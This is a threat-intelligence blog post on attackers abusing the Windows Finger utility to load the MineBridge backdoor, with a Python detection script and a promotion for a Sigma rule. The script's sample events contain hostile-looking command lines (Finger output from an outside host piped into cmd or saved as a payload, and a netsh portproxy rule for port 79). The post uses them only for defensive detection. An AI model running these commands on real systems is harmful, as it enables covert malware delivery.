Threat actors constantly search for new ways to circumvent Windows security restrictions and drop malware onto a targeted network. Native Windows executables, known as LOLBins (living-off-the-land binaries), are frequently misused for this purpose. Recently, the Windows Finger utility joined this list after hackers abused it to deliver the MineBridge backdoor.
The Finger feature is a native Windows command used to retrieve information about users on remote systems. However, security researchers identified a method to convert Finger into a file loader and C&C server for data exfiltration. Specifically, malicious commands can be masqueraded as Finger queries that retrieve files and dump data without alerting antivirus mechanisms. The key obstacle to mass exploitation is that the Finger protocol relies on TCP port 79, which is typically blocked. Nevertheless, a privileged attacker can overcome this restriction by redirecting TCP traffic with Windows NetSh Portproxy. Although proof-of-concept (PoC) exploits were developed and published in September 2020, hackers exploited the Finger feature in the wild only in January 2021.
The first cybercriminal operation identified as misusing the Windows Finger command aimed to deliver the MineBridge backdoor. This malware strain emerged at the beginning of 2020 and was actively used to target US and South Korean financial institutions. The infection usually starts with a phishing email that has a malicious Word file attached. The document masquerades as a job application and, once opened, installs the backdoor via malicious macros.
The attack chain remains the same for the latest MineBridge campaign. In this case, however, the macros execute a command that relies on Finger to launch a Base64-encoded malware loader. This loader drops TeamViewer on the infected device and applies DLL hijacking to install the MineBridge backdoor. Once installed, the backdoor provides full remote access to the victim’s system, allowing hackers to install additional malware, execute arbitrary files, grab system information, and more.
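As an added example (not part of the original post, and not SOC Prime's Sigma rule), the Python script below applies the detection logic implied by the two passages above to constructed process-creation events in a simplified Sysmon Event ID 1 style. It flags any finger.exe execution, raises the severity when Finger is spawned by an Office application (the macro-driven chain) or when its output is redirected to a file or piped into a command interpreter (Finger acting as a loader), and separately flags netsh portproxy rules that involve port 79 (the workaround for the blocked Finger port). The sample events, IP addresses, field names and tag names are assumptions made for illustration only.

```python
import re
from typing import Dict, List

# Constructed sample process-creation events (Sysmon Event ID 1 style fields:
# Image, ParentImage, CommandLine). Illustrative only, not real telemetry.
SAMPLE_EVENTS = [
    # 0: finger.exe launched by Word, as in the macro-driven chain described above
    {"Image": r"C:\Windows\System32\finger.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "finger.exe stage@192.0.2.10"},
    # 1: Finger output piped straight into a command interpreter (Finger as a loader)
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c finger.exe stage@203.0.113.5 | cmd"},
    # 2: netsh portproxy rule that touches port 79 (bypassing the blocked Finger port)
    {"Image": r"C:\Windows\System32\netsh.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "netsh interface portproxy add v4tov4 listenport=79 "
                    "connectport=8080 connectaddress=203.0.113.5"},
    # 3: unrelated benign process, should produce no tags
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe report.txt"},
    # 4: Finger output written to a file (retrieving a payload without a browser)
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c finger.exe stage@203.0.113.5 > %TEMP%\\payload.b64"},
]

# Office applications whose child processes deserve extra scrutiny
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")

# finger or finger.exe appearing as a token in the command line
FINGER_RE = re.compile(r'(^|[\\\s"])finger(\.exe)?\b', re.IGNORECASE)
# finger output piped into a script host or shell
PIPE_TO_INTERP_RE = re.compile(
    r"\|\s*(cmd|powershell|pwsh|mshta|wscript|cscript)(\.exe)?\b", re.IGNORECASE)
# finger output redirected to a file
REDIRECT_RE = re.compile(r">\s*\S+")
# portproxy rule whose listen or connect port is 79 (Finger)
PORTPROXY_RE = re.compile(
    r"\bportproxy\b.*\b(listenport|connectport)=79\b", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (handles both slash styles)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(event: Dict[str, str]) -> List[str]:
    """Return detection tags for one process-creation event (empty = nothing found)."""
    tags: List[str] = []
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")

    if image == "finger.exe" or FINGER_RE.search(cmdline):
        # Finger is rarely used in modern environments, so any execution is worth a look
        tags.append("finger_execution")
        if parent in OFFICE_PARENTS:
            tags.append("finger_spawned_by_office")
        if PIPE_TO_INTERP_RE.search(cmdline):
            tags.append("finger_output_to_interpreter")
        if REDIRECT_RE.search(cmdline):
            tags.append("finger_output_redirected")
    if image == "netsh.exe" and PORTPROXY_RE.search(cmdline):
        tags.append("portproxy_port_79")
    return tags


def scan(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map event index -> tags for every event that triggered at least one tag."""
    findings: Dict[int, List[str]] = {}
    for idx, event in enumerate(events):
        tags = analyze_event(event)
        if tags:
            findings[idx] = tags
    return findings


if __name__ == "__main__":
    for idx, tags in scan(SAMPLE_EVENTS).items():
        print(f"[{idx}] {SAMPLE_EVENTS[idx]['CommandLine']} -> {', '.join(tags)}")
```

In production, the same logic belongs in the SIEM or EDR query language rather than in a script, but the structure carries over: a base condition on the finger.exe image or command line, an escalating condition on the parent process and on output redirection, and an independent rule for portproxy changes involving port 79, since the port redirection may happen in a separate process well before Finger is invoked.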
To detect malicious activity associated with Windows Finger misuse, you can download a fresh Sigma rule from the SOC Prime team:
The rule has translations to the following platforms:
SIEM: Azure Sentinel, ArcSight, QRadar, Splunk, Graylog, Sumo Logic, ELK Stack, LogPoint, Humio, RSA NetWitness
EDR: Microsoft Defender ATP, Carbon Black
Tactics: Execution, Defense Evasion
Techniques: Signed Binary Proxy Execution (T1218)
If you don’t have paid access to the Threat Detection Marketplace, you can activate a free trial under the community subscription to unlock the Sigma rule related to Windows Finger misuse.
Sign up for the Threat Detection Marketplace for free and expand your threat detection capabilities with new SOC content items released every day. Want to create your own Sigma rules? Join our Threat Bounty community and contribute to threat hunting initiatives!